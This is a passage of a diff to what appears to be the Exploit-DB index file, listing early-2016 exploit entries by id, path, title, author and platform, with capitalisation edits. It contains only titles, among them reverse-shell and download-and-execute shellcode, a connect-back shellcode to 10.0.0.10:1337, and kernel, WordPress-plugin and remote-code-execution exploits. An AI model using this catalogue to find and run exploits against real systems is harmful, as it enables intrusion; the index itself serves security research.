AppleOscarCompass Use-After-Free",2016-01-28,"Google Security Research",ios,dos,0 @@ -35607,23 +35607,23 @@ id,file,description,date,author,platform,type,port 39365,platforms/multiple/dos/39365.c,"OS X and iOS Kernel - IOHDIXControllUserClient::clientClose Use-After-Free/Double Free",2016-01-28,"Google Security Research",multiple,dos,0 39366,platforms/multiple/dos/39366.c,"OS X and iOS Kernel - iokit Registry Iterator Manipulation Double Free",2016-01-28,"Google Security Research",multiple,dos,0 39367,platforms/osx/dos/39367.c,"OSX - io_service_close Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0 -39368,platforms/osx/dos/39368.c,"OS X - gst_configure Kernel Buffer Overflow",2016-01-28,"Google Security Research",osx,dos,0 -39369,platforms/osx/dos/39369.c,"OS X - IntelAccelerator::gstqConfigure Exploitable Kernel NULL Dereference",2016-01-28,"Google Security Research",osx,dos,0 +39368,platforms/osx/dos/39368.c,"OSX - gst_configure Kernel Buffer Overflow",2016-01-28,"Google Security Research",osx,dos,0 +39369,platforms/osx/dos/39369.c,"OSX - IntelAccelerator::gstqConfigure Exploitable Kernel NULL Dereference",2016-01-28,"Google Security Research",osx,dos,0 39370,platforms/osx/dos/39370.c,"OS X Kernel - Hypervisor Driver Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0 -39376,platforms/osx/dos/39376.c,"OS X - IOSCSIPeripheralDeviceType00 Userclient Type 12 Exploitable Kernel NULL Dereference",2016-01-28,"Google Security Research",osx,dos,0 +39376,platforms/osx/dos/39376.c,"OSX - IOSCSIPeripheralDeviceType00 Userclient Type 12 Exploitable Kernel NULL Dereference",2016-01-28,"Google Security Research",osx,dos,0 39377,platforms/multiple/dos/39377.c,"OS X and iOS - Unsandboxable Kernel Use-After-Free in Mach Vouchers",2016-01-28,"Google Security Research",multiple,dos,0 -39378,platforms/multiple/dos/39378.c,"iOS and OS X - NECP System Control Socket Packet Parsing Kernel Code Execution Integer Overflow",2016-01-28,"Google Security Research",multiple,dos,0 -39379,platforms/multiple/dos/39379.txt,"iOS and OS X Kernel - Double-Delete IOHIDEventQueue::start Code Execution",2016-01-28,"Google Security Research",multiple,dos,0 -39380,platforms/osx/dos/39380.c,"OS X - OSMetaClassBase::safeMetaCast in IOAccelContext2::connectClient Exploitable NULL Dereference",2016-01-28,"Google Security Research",osx,dos,0 -39381,platforms/osx/dos/39381.c,"OS X - IOHDIXControllerUserClient::convertClientBuffer Integer Overflow",2016-01-28,"Google Security Research",osx,dos,0 +39378,platforms/multiple/dos/39378.c,"iOS and OSX - NECP System Control Socket Packet Parsing Kernel Code Execution Integer Overflow",2016-01-28,"Google Security Research",multiple,dos,0 +39379,platforms/multiple/dos/39379.txt,"iOS and OSX Kernel - Double-Delete IOHIDEventQueue::start Code Execution",2016-01-28,"Google Security Research",multiple,dos,0 +39380,platforms/osx/dos/39380.c,"OSX - OSMetaClassBase::safeMetaCast in IOAccelContext2::connectClient Exploitable NULL Dereference",2016-01-28,"Google Security Research",osx,dos,0 +39381,platforms/osx/dos/39381.c,"OSX - IOHDIXControllerUserClient::convertClientBuffer Integer Overflow",2016-01-28,"Google Security Research",osx,dos,0 39382,platforms/multiple/webapps/39382.txt,"SAP HANA 1.00.095 - hdbindexserver Memory Corruption",2016-01-28,ERPScan,multiple,webapps,0 -39383,platforms/lin_x86-64/shellcode/39383.c,"Linux/x86-64 - shell_reverse_tcp with Password Polymorphic shellcode (1) (122 bytes)",2016-01-29,"Sathish kumar",lin_x86-64,shellcode,0 -39384,platforms/php/webapps/39384.txt,"WordPress Simple Add Pages or Posts Plugin 1.6 - Cross-Site Request Forgery",2016-01-29,ALIREZA_PROMIS,php,webapps,0 +39383,platforms/lin_x86-64/shellcode/39383.c,"Linux/x86-64 - shell_reverse_tcp with Password Polymorphic Shellcode (1) (122 bytes)",2016-01-29,"Sathish kumar",lin_x86-64,shellcode,0 +39384,platforms/php/webapps/39384.txt,"Wordpress Simple Add Pages or Posts Plugin 1.6 - Cross-Site Request Forgery",2016-01-29,ALIREZA_PROMIS,php,webapps,0 39385,platforms/php/webapps/39385.txt,"ProjectSend r582 - Multiple Vulnerabilities",2016-01-29,"Filippo Cavallarin",php,webapps,80 39387,platforms/php/webapps/39387.py,"iScripts EasyCreate 3.0 - Remote Code Execution Exploit",2016-02-01,"Bikramaditya Guha",php,webapps,80 -39388,platforms/lin_x86-64/shellcode/39388.c,"Linux/x86-64 - shell_reverse_tcp with Password Polymorphic shellcode (2) (135 bytes)",2016-02-01,"Sathish kumar",lin_x86-64,shellcode,0 +39388,platforms/lin_x86-64/shellcode/39388.c,"Linux/x86-64 - shell_reverse_tcp with Password Polymorphic Shellcode (2) (135 bytes)",2016-02-01,"Sathish kumar",lin_x86-64,shellcode,0 39389,platforms/lin_x86/shellcode/39389.c,"Linux/x86 - Download & Execute Shellcode (135 bytes)",2016-02-01,B3mB4m,lin_x86,shellcode,0 -39390,platforms/lin_x86-64/shellcode/39390.c,"Linux/x86-64 - Polymorphic Execve-Stack shellcode (47 bytes)",2016-02-01,"Sathish kumar",lin_x86-64,shellcode,0 +39390,platforms/lin_x86-64/shellcode/39390.c,"Linux/x86-64 - Polymorphic Execve-Stack Shellcode (47 bytes)",2016-02-01,"Sathish kumar",lin_x86-64,shellcode,0 39391,platforms/java/webapps/39391.txt,"Hippo CMS 10.1 - Multiple Vulnerabilities",2016-02-01,LiquidWorm,java,webapps,80 39393,platforms/windows/dos/39393.txt,"Autonics DAQMaster 1.7.3 - DQP Parsing Buffer Overflow Code Execution",2016-02-01,LiquidWorm,windows,dos,0 39394,platforms/multiple/webapps/39394.txt,"ManageEngine EventLog Analyzer 4.0 < 10 - Privilege Escalation",2016-02-01,GraphX,multiple,webapps,80 @@ -35642,8 +35642,8 @@ id,file,description,date,author,platform,type,port 39407,platforms/hardware/webapps/39407.txt,"Viprinet Multichannel VPN Router 300 - Persistent Cross-Site Scripting",2016-02-03,Portcullis,hardware,webapps,0 39408,platforms/hardware/webapps/39408.txt,"GE Industrial Solutions UPS SNMP Adapter < 4.8 - Multiple Vulnerabilities",2016-02-04,"Karn Ganeshen",hardware,webapps,0 39409,platforms/hardware/webapps/39409.txt,"DLink DVG­N5402SP - Multiple Vulnerabilities",2016-02-04,"Karn Ganeshen",hardware,webapps,0 -39410,platforms/php/webapps/39410.txt,"WordPress User Meta Manager Plugin 3.4.6 - Blind SQL Injection",2016-02-04,"Panagiotis Vagenas",php,webapps,80 -39411,platforms/php/webapps/39411.txt,"WordPress User Meta Manager Plugin 3.4.6 - Privilege Escalation",2016-02-04,"Panagiotis Vagenas",php,webapps,80 +39410,platforms/php/webapps/39410.txt,"Wordpress User Meta Manager Plugin 3.4.6 - Blind SQL Injection",2016-02-04,"Panagiotis Vagenas",php,webapps,80 +39411,platforms/php/webapps/39411.txt,"Wordpress User Meta Manager Plugin 3.4.6 - Privilege Escalation",2016-02-04,"Panagiotis Vagenas",php,webapps,80 39412,platforms/hardware/webapps/39412.txt,"NETGEAR ProSafe Network Management System NMS300 - Multiple Vulnerabilities",2016-02-04,"Pedro Ribeiro",hardware,webapps,0 39413,platforms/php/webapps/39413.txt,"UliCMS v9.8.1 - SQL Injection",2016-02-04,"Manuel García Cárdenas",php,webapps,80 39414,platforms/php/webapps/39414.txt,"OpenDocMan 1.3.4 - Cross-Site Request Forgery",2016-02-04,"Curesec Research Team",php,webapps,80 @@ -35652,10 +35652,10 @@ id,file,description,date,author,platform,type,port 39417,platforms/windows/local/39417.py,"FTPShell Client 5.24 - (Create NewFolder) Local Buffer Overflow",2016-02-04,"Arash Khazaei",windows,local,0 39418,platforms/java/webapps/39418.txt,"Solr 3.5.0 - Arbitrary Data Deletion",2016-02-08,N37,java,webapps,0 39419,platforms/multiple/webapps/39419.txt,"dotDefender Firewall 5.00.12865 / 5.13-13282 - Cross-Site Request Forgery",2016-02-08,hyp3rlinx,multiple,webapps,0 -39420,platforms/php/webapps/39420.txt,"WordPress User Meta Manager Plugin 3.4.6 - Information Disclosure",2016-02-08,"Panagiotis Vagenas",php,webapps,80 -39421,platforms/php/webapps/39421.py,"WordPress WooCommerce Store Toolkit Plugin 1.5.5 - Privilege Escalation",2016-02-08,"Panagiotis Vagenas",php,webapps,80 -39422,platforms/php/webapps/39422.py,"WordPress WP User Frontend Plugin < 2.3.11 - Unrestricted File Upload",2016-02-08,"Panagiotis Vagenas",php,webapps,80 -39423,platforms/php/webapps/39423.txt,"WordPress Booking Calendar Contact Form Plugin 1.0.23 - Multiple Vulnerabilities",2016-02-08,"i0akiN SEC-LABORATORY",php,webapps,80 +39420,platforms/php/webapps/39420.txt,"Wordpress User Meta Manager Plugin 3.4.6 - Information Disclosure",2016-02-08,"Panagiotis Vagenas",php,webapps,80 +39421,platforms/php/webapps/39421.py,"Wordpress WooCommerce Store Toolkit Plugin 1.5.5 - Privilege Escalation",2016-02-08,"Panagiotis Vagenas",php,webapps,80 +39422,platforms/php/webapps/39422.py,"Wordpress WP User Frontend Plugin < 2.3.11 - Unrestricted File Upload",2016-02-08,"Panagiotis Vagenas",php,webapps,80 +39423,platforms/php/webapps/39423.txt,"Wordpress Booking Calendar Contact Form Plugin 1.0.23 - Multiple Vulnerabilities",2016-02-08,"i0akiN SEC-LABORATORY",php,webapps,80 39424,platforms/android/dos/39424.txt,"Samsung Galaxy S6 - libQjpeg je_free Crash",2016-02-08,"Google Security Research",android,dos,0 39425,platforms/android/dos/39425.txt,"Samsung Galaxy S6 - android.media.process Face Recognition Memory Corruption (MdConvertLine)",2016-02-08,"Google Security Research",android,dos,0 39426,platforms/multiple/dos/39426.txt,"Adobe Flash - Processing AVC Causes Stack Corruption",2016-02-08,"Google Security Research",multiple,dos,0 @@ -35680,7 +35680,7 @@ id,file,description,date,author,platform,type,port 39448,platforms/php/webapps/39448.txt,"Tiny Tiny RSS - Blind SQL Injection",2016-02-15,"Kacper Szurek",php,webapps,80 39449,platforms/multiple/webapps/39449.txt,"ManageEngine OPutils 8.0 - Multiple Vulnerabilities",2016-02-16,"Kaustubh G. Padwad",multiple,webapps,0 39450,platforms/multiple/webapps/39450.txt,"ManageEngine Network Configuration Management Build 11000 - Privilege Escalation",2016-02-16,"Kaustubh G. Padwad",multiple,webapps,0 -39451,platforms/php/webapps/39451.txt,"WordPress ALO EasyMail Newsletter Plugin 2.6.01 - Cross-Site Request Forgery",2016-02-16,"Mohsen Lotfi",php,webapps,80 +39451,platforms/php/webapps/39451.txt,"Wordpress ALO EasyMail Newsletter Plugin 2.6.01 - Cross-Site Request Forgery",2016-02-16,"Mohsen Lotfi",php,webapps,80 39452,platforms/windows/dos/39452.txt,"CyberCop Scanner Smbgrind 5.5 - Buffer Overflow",2016-02-16,hyp3rlinx,windows,dos,0 39453,platforms/php/webapps/39453.txt,"phpMyBackupPro 2.5 - Remote Command Execution / Cross-Site Request Forgery",2016-02-16,hyp3rlinx,php,webapps,0 39454,platforms/linux/dos/39454.txt,"glibc - getaddrinfo Stack-Based Buffer Overflow",2016-02-16,"Google Security Research",linux,dos,0 @@ -35715,16 +35715,16 @@ id,file,description,date,author,platform,type,port 39486,platforms/windows/webapps/39486.txt,"Dell OpenManage Server Administrator 8.2 - Authenticated Directory Traversal",2016-02-23,hantwister,windows,webapps,0 39487,platforms/multiple/dos/39487.py,"libquicktime 1.2.4 - Integer Overflow",2016-02-23,"Marco Romano",multiple,dos,0 39488,platforms/json/webapps/39488.txt,"Ubiquiti Networks UniFi 3.2.10 - Cross-Site Request Forgery",2016-02-23,"Julien Ahrens",json,webapps,8443 -39489,platforms/php/webapps/39489.py,"WordPress Extra User Details Plugin 0.4.2 - Privilege Escalation",2016-02-24,"Panagiotis Vagenas",php,webapps,80 +39489,platforms/php/webapps/39489.py,"Wordpress Extra User Details Plugin 0.4.2 - Privilege Escalation",2016-02-24,"Panagiotis Vagenas",php,webapps,80 39490,platforms/multiple/dos/39490.txt,"Wireshark - vwr_read_s2_s3_W_rec Heap-Based Buffer Overflow",2016-02-24,"Google Security Research",multiple,dos,0 39491,platforms/linux/dos/39491.txt,"libxml2 - xmlDictAddString Heap-Based Buffer Overread",2016-02-24,"Google Security Research",linux,dos,0 39492,platforms/linux/dos/39492.txt,"libxml2 - xmlParseEndTag2 Heap-Based Buffer Overread",2016-02-24,"Google Security Research",linux,dos,0 39493,platforms/linux/dos/39493.txt,"libxml2 - xmlParserPrintFileContextInternal Heap-Based Buffer Overread",2016-02-24,"Google Security Research",linux,dos,0 39494,platforms/linux/dos/39494.txt,"libxml2 - htmlCurrentChar Heap-Based Buffer Overread",2016-02-24,"Google Security Research",linux,dos,0 39495,platforms/windows/webapps/39495.py,"IBM Lotus Domino R8 - Password Hash Extraction Exploit",2016-02-25,"Jonathan Broche",windows,webapps,0 -39496,platforms/arm/shellcode/39496.c,"Linux/ARM - Connect back to 10.0.0.10:1337 with /bin/sh shellcode (95 bytes)",2016-02-26,Xeon,arm,shellcode,0 +39496,platforms/arm/shellcode/39496.c,"Linux/ARM - Connect back to 10.0.0.10:1337 with /bin/sh Shellcode (95 bytes)",2016-02-26,Xeon,arm,shellcode,0 39497,platforms/ashx/webapps/39497.txt,"Infor CRM 8.2.0.1136 - Multiple HTML Script Injection Vulnerabilities",2016-02-26,LiquidWorm,ashx,webapps,0 -39498,platforms/php/webapps/39498.txt,"WordPress Ocim MP3 Plugin - SQL Injection",2016-02-26,"xevil and Blankon33",php,webapps,80 +39498,platforms/php/webapps/39498.txt,"Wordpress Ocim MP3 Plugin - SQL Injection",2016-02-26,"xevil and Blankon33",php,webapps,80 39499,platforms/linux/remote/39499.txt,"Proxmox VE 3/4 - Insecure Hostname Checking Remote Root Exploit",2016-02-26,Sysdream,linux,remote,0 39500,platforms/linux/webapps/39500.txt,"Zimbra 8.0.9 GA - Cross-Site Request Forgery",2016-02-26,Sysdream,linux,webapps,443 39501,platforms/php/webapps/39501.txt,"Centreon 2.5.3 - Remote Command Execution",2016-02-26,Sysdream,php,webapps,0 @@ -35733,12 +35733,12 @@ id,file,description,date,author,platform,type,port 39504,platforms/android/dos/39504.c,"Qualcomm Adreno GPU MSM Driver - perfcounter Query Heap Overflow",2016-02-26,"Google Security Research",android,dos,0 39505,platforms/linux/dos/39505.c,"Linux io_submit L2TP sendmsg - Integer Overflow",2016-02-26,"Google Security Research",linux,dos,0 39506,platforms/php/webapps/39506.txt,"JSN PowerAdmin Joomla! Extension 2.3.0 - Multiple Vulnerabilities",2016-02-26,"RatioSec Research",php,webapps,80 -39507,platforms/php/webapps/39507.txt,"WordPress More Fields 2.1 Plugin - Cross-Site Request Forgery",2016-02-29,"Aatif Shahdad",php,webapps,80 +39507,platforms/php/webapps/39507.txt,"Wordpress More Fields 2.1 Plugin - Cross-Site Request Forgery",2016-02-29,"Aatif Shahdad",php,webapps,80 39508,platforms/windows/local/39508.ps1,"Comodo Anti-Virus - SHFolder.dll Local Privilege Elevation Exploit",2016-02-29,Laughing_Mantis,windows,local,0 39509,platforms/windows/dos/39509.txt,"Crouzet em4 soft 1.1.04 - .pm4 Integer Division By Zero",2016-03-01,LiquidWorm,windows,dos,0 39510,platforms/windows/local/39510.txt,"Crouzet em4 soft 1.1.04 and M3 soft 3.1.2.0 - Insecure File Permissions",2016-03-01,LiquidWorm,windows,local,0 39512,platforms/windows/dos/39512.txt,"Viscomsoft Calendar Active-X 2.0 - Multiple Crash PoCs",2016-03-01,"Shantanu Khandelwal",windows,dos,0 -39513,platforms/php/webapps/39513.txt,"WordPress CP Polls Plugin 1.0.8 - Multiple Vulnerabilities",2016-03-01,"i0akiN SEC-LABORATORY",php,webapps,80 +39513,platforms/php/webapps/39513.txt,"Wordpress CP Polls Plugin 1.0.8 - Multiple Vulnerabilities",2016-03-01,"i0akiN SEC-LABORATORY",php,webapps,80 39514,platforms/php/remote/39514.rb,"ATutor 2.2.1 - SQL Injection / Remote Code Execution",2016-03-01,Metasploit,php,remote,80 39515,platforms/windows/remote/39515.rb,"NETGEAR ProSafe Network Management System 300 - Arbitrary File Upload",2016-03-01,Metasploit,windows,remote,8080 39516,platforms/windows/dos/39516.py,"Quick Tftp Server Pro 2.3 - Read Mode Denial of Service",2016-03-02,"Guillaume Kaddouch",windows,dos,69 @@ -35746,7 +35746,7 @@ id,file,description,date,author,platform,type,port 39518,platforms/windows/dos/39518.txt,"PictureTrails Photo Editor GE.exe 2.0.0 - .bmp Crash PoC",2016-03-02,redknight99,windows,dos,0 39519,platforms/win_x86/shellcode/39519.c,"Windows x86 - Download & Run via WebDAV Null Free Shellcode (96 bytes)",2016-03-02,"Sean Dillon",win_x86,shellcode,0 39520,platforms/win_x86-64/local/39520.txt,"Secret Net 7 and Secret Net Studio 8 - Privilege Escalation",2016-03-02,Cr4sh,win_x86-64,local,0 -39521,platforms/php/webapps/39521.txt,"WordPress Bulk Delete Plugin 5.5.3 - Privilege Escalation",2016-03-03,"Panagiotis Vagenas",php,webapps,80 +39521,platforms/php/webapps/39521.txt,"Wordpress Bulk Delete Plugin 5.5.3 - Privilege Escalation",2016-03-03,"Panagiotis Vagenas",php,webapps,80 39522,platforms/hardware/remote/39522.txt,"Schneider Electric SBO / AS - Multiple Vulnerabilities",2016-03-03,"Karn Ganeshen",hardware,remote,0 39523,platforms/windows/local/39523.rb,"AppLocker - Execution Prevention Bypass",2016-03-03,Metasploit,windows,local,0 39524,platforms/php/webapps/39524.js,"ATutor LMS - install_modules.php Cross-Site Request Forgery Remote Code Execution",2016-03-07,mr_me,php,webapps,0 @@ -35758,7 +35758,7 @@ id,file,description,date,author,platform,type,port 39533,platforms/windows/dos/39533.txt,"Adobe Digital Editions 4.5.0 - .pdf Critical Memory Corruption",2016-03-09,"Pier-Luc Maltais",windows,dos,0 39534,platforms/php/webapps/39534.html,"Bluethrust Clan Scripts v4 R17 - Multiple Vulnerabilities",2016-03-09,"Brandon Murphy",php,webapps,80 39535,platforms/linux/local/39535.sh,"Exim 4.84-3 - Privilege Escalation",2016-03-09,"Hacker Fantastic",linux,local,0 -39536,platforms/php/webapps/39536.txt,"WordPress SiteMile Project Theme 2.0.9.5 - Multiple Vulnerabilities",2016-03-09,"LSE Leading Security Experts GmbH",php,webapps,80 +39536,platforms/php/webapps/39536.txt,"Wordpress SiteMile Project Theme 2.0.9.5 - Multiple Vulnerabilities",2016-03-09,"LSE Leading Security Experts GmbH",php,webapps,80 39537,platforms/linux/dos/39537.txt,"Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - digi_acceleport Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0 39538,platforms/linux/dos/39538.txt,"Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - Wacom Multiple Nullpointer Dereferences",2016-03-09,"OpenSource Security",linux,dos,0 39539,platforms/linux/dos/39539.txt,"Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - visor (treo_attach) Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0 @@ -35769,18 +35769,18 @@ id,file,description,date,author,platform,type,port 39544,platforms/linux/dos/39544.txt,"Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - aiptek Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0 39545,platforms/linux/dos/39545.txt,"Linux Kernel 3.10 / 3.18 / 4.4 - netfilter IPT_SO_SET_REPLACE Memory Corruption",2016-03-09,"Google Security Research",linux,dos,0 39546,platforms/windows/dos/39546.txt,"Nitro Pro 10.5.7.32 & Nitro Reader 5.5.3.1 - Heap Memory Corruption",2016-03-10,"Francis Provencher",windows,dos,0 -39547,platforms/php/webapps/39547.txt,"WordPress Best Web Soft Captcha Plugin 4.1.5 - Multiple Vulnerabilities",2016-03-10,"Colette Chamberland",php,webapps,80 -39548,platforms/php/webapps/39548.txt,"WordPress WP Advanced Comment Plugin 0.10 - Persistent Cross-Site Scripting",2016-03-10,"Mohammad Khaleghi",php,webapps,80 +39547,platforms/php/webapps/39547.txt,"Wordpress Best Web Soft Captcha Plugin 4.1.5 - Multiple Vulnerabilities",2016-03-10,"Colette Chamberland",php,webapps,80 +39548,platforms/php/webapps/39548.txt,"Wordpress WP Advanced Comment Plugin 0.10 - Persistent Cross-Site Scripting",2016-03-10,"Mohammad Khaleghi",php,webapps,80 39549,platforms/linux/local/39549.txt,"Exim < 4.86.2 - Privilege Escalation",2016-03-10,"Dawid Golunski",linux,local,0 39550,platforms/multiple/dos/39550.py,"libotr 4.1.0 - Memory Corruption",2016-03-10,"X41 D-Sec GmbH",multiple,dos,0 39551,platforms/multiple/dos/39551.txt,"Putty pscp 0.66 - Stack Buffer Overwrite",2016-03-10,tintinweb,multiple,dos,0 -39552,platforms/php/webapps/39552.txt,"WordPress Beauty & Clean Theme 1.0.8 - Arbitrary File Upload",2016-03-11,"Colette Chamberland",php,webapps,80 -39553,platforms/php/webapps/39553.txt,"WordPress DZS Videogallery Plugin <=8.60 - Multiple Vulnerabilities",2016-03-11,"Colette Chamberland",php,webapps,80 +39552,platforms/php/webapps/39552.txt,"Wordpress Beauty & Clean Theme 1.0.8 - Arbitrary File Upload",2016-03-11,"Colette Chamberland",php,webapps,80 +39553,platforms/php/webapps/39553.txt,"Wordpress DZS Videogallery Plugin <=8.60 - Multiple Vulnerabilities",2016-03-11,"Colette Chamberland",php,webapps,80 39554,platforms/php/remote/39554.rb,"PHP Utility Belt - Remote Code Execution (Metasploit)",2016-03-11,Metasploit,php,remote,80 39555,platforms/linux/dos/39555.txt,"Linux Kernel 3.10.0-229.x (RHEL 7.1 / CentOS) - snd-usb-audio Crash PoC",2016-03-14,"OpenSource Security",linux,dos,0 39556,platforms/linux/dos/39556.txt,"Linux Kernel 3.10.0-229.x (RHEL 7.1 / CentOS) - iowarrior driver Crash PoC",2016-03-14,"OpenSource Security",linux,dos,0 39557,platforms/windows/dos/39557.py,"Zortam Mp3 Media Studio 20.15 - SEH Overflow Denial of Service",2016-03-14,INSECT.B,windows,dos,0 -39558,platforms/php/webapps/39558.txt,"WordPress Site Import Plugin 1.0.1 - Local File Inclusion / Remote File Inclusion",2016-03-14,Wadeek,php,webapps,80 +39558,platforms/php/webapps/39558.txt,"Wordpress Site Import Plugin 1.0.1 - Local File Inclusion / Remote File Inclusion",2016-03-14,Wadeek,php,webapps,80 39559,platforms/php/webapps/39559.txt,"TeamPass 2.1.24 - Multiple Vulnerabilities",2016-03-14,"Vincent Malguy",php,webapps,80 39560,platforms/windows/dos/39560.txt,"Windows Kernel - ATMFD.dll OTF Font Processing Pool-Based Buffer Overflow (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0 39561,platforms/windows/dos/39561.txt,"Windows Kernel - ATMFD.dll OTF Font Processing Stack Corruption (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0 @@ -35793,31 +35793,31 @@ id,file,description,date,author,platform,type,port 39570,platforms/freebsd_x86-64/dos/39570.c,"FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow",2016-03-16,"Core Security",freebsd_x86-64,dos,0 39572,platforms/php/webapps/39572.txt,"PivotX 2.3.11 - Directory Traversal",2016-03-17,"Curesec Research Team",php,webapps,80 39573,platforms/windows/webapps/39573.txt,"Wildfly - WEB-INF and META-INF Information Disclosure via Filter Restriction Bypass",2016-03-20,"Tal Solomon of Palantir Security",windows,webapps,0 -39574,platforms/windows/local/39574.cs,"Microsoft Windows 8.1/10 - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032)",2016-03-21,"Google Security Research",windows,local,0 -39575,platforms/php/webapps/39575.txt,"WordPress eBook Download Plugin 1.1 - Directory Traversal",2016-03-21,Wadeek,php,webapps,80 -39576,platforms/php/webapps/39576.txt,"WordPress Import CSV Plugin 1.0 - Directory Traversal",2016-03-21,Wadeek,php,webapps,80 -39577,platforms/php/webapps/39577.txt,"WordPress Abtest Plugin - Local File Inclusion",2016-03-21,CrashBandicot,php,webapps,80 +39574,platforms/windows/local/39574.cs,"Microsoft Windows 8.1/10 (Windows/x86) - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032)",2016-03-21,"Google Security Research",windows,local,0 +39575,platforms/php/webapps/39575.txt,"Wordpress eBook Download Plugin 1.1 - Directory Traversal",2016-03-21,Wadeek,php,webapps,80 +39576,platforms/php/webapps/39576.txt,"Wordpress Import CSV Plugin 1.0 - Directory Traversal",2016-03-21,Wadeek,php,webapps,80 +39577,platforms/php/webapps/39577.txt,"Wordpress Abtest Plugin - Local File Inclusion",2016-03-21,CrashBandicot,php,webapps,80 39578,platforms/lin_x86-64/shellcode/39578.c,"Linux/x86-64 - Reverse Shell Shellcode",2016-03-21,"Sudhanshu Chauhan",lin_x86-64,shellcode,0 39579,platforms/windows/local/39579.py,"Internet Download Manager 6.25 Build 14 - 'Find file' Unicode SEH Exploit",2016-03-21,"Rakan Alotaibi",windows,local,0 39580,platforms/php/webapps/39580.txt,"Disc ORGanizer - DORG - Multiple Vulnerabilities",2016-03-21,SECUPENT,php,webapps,80 39581,platforms/hardware/webapps/39581.txt,"D-Link DWR-932 Firmware 4.00 - Authentication Bypass",2016-03-21,"Saeed reza Zamanian",hardware,webapps,80 39582,platforms/php/webapps/39582.txt,"Xoops 2.5.7.2 - Arbitrary User Deletions Cross-Site Request Forgery",2016-03-21,hyp3rlinx,php,webapps,80 39583,platforms/php/webapps/39583.txt,"Xoops 2.5.7.2 - Directory Traversal Bypass",2016-03-21,hyp3rlinx,php,webapps,80 -39584,platforms/php/webapps/39584.txt,"WordPress Image Export Plugin 1.1.0 - Arbitrary File Disclosure",2016-03-21,AMAR^SHG,php,webapps,80 +39584,platforms/php/webapps/39584.txt,"Wordpress Image Export Plugin 1.1.0 - Arbitrary File Disclosure",2016-03-21,AMAR^SHG,php,webapps,80 39585,platforms/windows/remote/39585.py,"Sysax Multi Server 6.50 - HTTP File Share SEH Overflow Remote Code Execution Exploit",2016-03-21,"Paul Purcell",windows,remote,80 39586,platforms/php/webapps/39586.txt,"Dating Pro Genie 2015.7 - Cross-Site Request Forgery",2016-03-21,"High-Tech Bridge SA",php,webapps,80 39587,platforms/php/webapps/39587.txt,"iTop 2.2.1 - Cross-Site Request Forgery",2016-03-21,"High-Tech Bridge SA",php,webapps,80 39588,platforms/php/webapps/39588.txt,"ProjectSend r582 - Multiple Cross-Site Scripting Vulnerabilities",2016-03-21,"Michael Helwig",php,webapps,80 -39589,platforms/php/webapps/39589.txt,"WordPress HB Audio Gallery Lite Plugin 1.0.0 - Arbitrary File Download",2016-03-22,CrashBandicot,php,webapps,80 -39590,platforms/php/webapps/39590.txt,"Joomla Easy Youtube Gallery 1.0.2 - SQL Injection",2016-03-22,"Persian Hack Team",php,webapps,80 -39591,platforms/php/webapps/39591.txt,"WordPress Brandfolder Plugin 3.0 - Remote File Inclusion / Local File Inclusion",2016-03-22,AMAR^SHG,php,webapps,80 -39592,platforms/php/webapps/39592.txt,"WordPress Dharma booking Plugin 2.38.3 - File Inclusion",2016-03-22,AMAR^SHG,php,webapps,80 -39593,platforms/php/webapps/39593.txt,"WordPress Memphis Document Library Plugin 3.1.5 - Arbitrary File Download",2016-03-22,"Felipe Molina",php,webapps,80 +39589,platforms/php/webapps/39589.txt,"Wordpress HB Audio Gallery Lite Plugin 1.0.0 - Arbitrary File Download",2016-03-22,CrashBandicot,php,webapps,80 +39590,platforms/php/webapps/39590.txt,"Joomla Easy YouTube Gallery 1.0.2 - SQL Injection",2016-03-22,"Persian Hack Team",php,webapps,80 +39591,platforms/php/webapps/39591.txt,"Wordpress Brandfolder Plugin 3.0 - Remote File Inclusion / Local File Inclusion",2016-03-22,AMAR^SHG,php,webapps,80 +39592,platforms/php/webapps/39592.txt,"Wordpress Dharma booking Plugin 2.38.3 - File Inclusion",2016-03-22,AMAR^SHG,php,webapps,80 +39593,platforms/php/webapps/39593.txt,"Wordpress Memphis Document Library Plugin 3.1.5 - Arbitrary File Download",2016-03-22,"Felipe Molina",php,webapps,80 39594,platforms/windows/local/39594.pl,"CoolPlayer (Standalone) build 2.19 - .m3u Stack Overflow",2016-03-22,"Charley Celice",windows,local,0 39595,platforms/multiple/local/39595.txt,"OS X / iOS - Suid Binary Logic Error Kernel Code Execution",2016-03-23,"Google Security Research",multiple,local,0 39596,platforms/hardware/remote/39596.py,"Multiple CCTV-DVR Vendors - Remote Code Execution",2016-03-23,K1P0D,hardware,remote,0 39597,platforms/multiple/webapps/39597.txt,"MiCollab 7.0 - SQL Injection",2016-03-23,"Goran Tuzovic",multiple,webapps,80 -39621,platforms/php/webapps/39621.txt,"WordPress Plugin IMDb Profile Widget 1.0.8 - Local File Inclusion",2016-03-27,CrashBandicot,php,webapps,80 +39621,platforms/php/webapps/39621.txt,"Wordpress Plugin IMDb Profile Widget 1.0.8 - Local File Inclusion",2016-03-27,CrashBandicot,php,webapps,80 39622,platforms/hardware/webapps/39622.txt,"Trend Micro Deep Discovery Inspector 3.8/3.7 - Cross-Site Request Forgery",2016-03-27,hyp3rlinx,hardware,webapps,80 39599,platforms/windows/remote/39599.txt,"Comodo Antivirus - Forwards Emulated API Calls to the Real API During Scans",2016-03-23,"Google Security Research",windows,remote,0 39600,platforms/windows/dos/39600.txt,"Avira - Heap Underflow Parsing PE Section Headers",2016-03-23,"Google Security Research",windows,dos,0 @@ -35835,12 +35835,12 @@ id,file,description,date,author,platform,type,port 39612,platforms/windows/dos/39612.txt,"Adobe Flash - Uninitialized Stack Parameter Access in Object.unwatch UaF Fix",2016-03-23,"Google Security Research",windows,dos,0 39613,platforms/windows/dos/39613.txt,"Adobe Flash - Uninitialized Stack Parameter Access in MovieClip.swapDepths UaF Fix",2016-03-23,"Google Security Research",windows,dos,0 39614,platforms/osx/dos/39614.c,"OS X Kernel - AppleKeyStore Use-After-Free",2016-03-23,"Google Security 